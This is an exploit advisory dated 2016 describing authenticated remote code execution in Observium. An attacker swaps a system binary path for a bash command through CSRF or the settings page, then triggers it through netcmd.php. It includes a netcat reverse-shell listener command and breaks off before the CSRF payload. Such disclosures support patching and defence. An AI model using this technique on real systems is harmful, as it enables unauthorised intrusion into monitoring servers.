# Exploit title: Observium Commercial - Authenticated RCE # Author: Dolev Farhi # Contact: dolevf at protonmail.com # Date: 28-04-2016 # Vendor homepage: http://observium.org/ # Software version: CE 0.16.7533 Authenticated remote code execution Using either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http:///netcmd.php?cmd=whois&query= using any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener root@pt:~# nc -lvp 4444 listening on [any] 4444 ... and a CSRF which looks like this: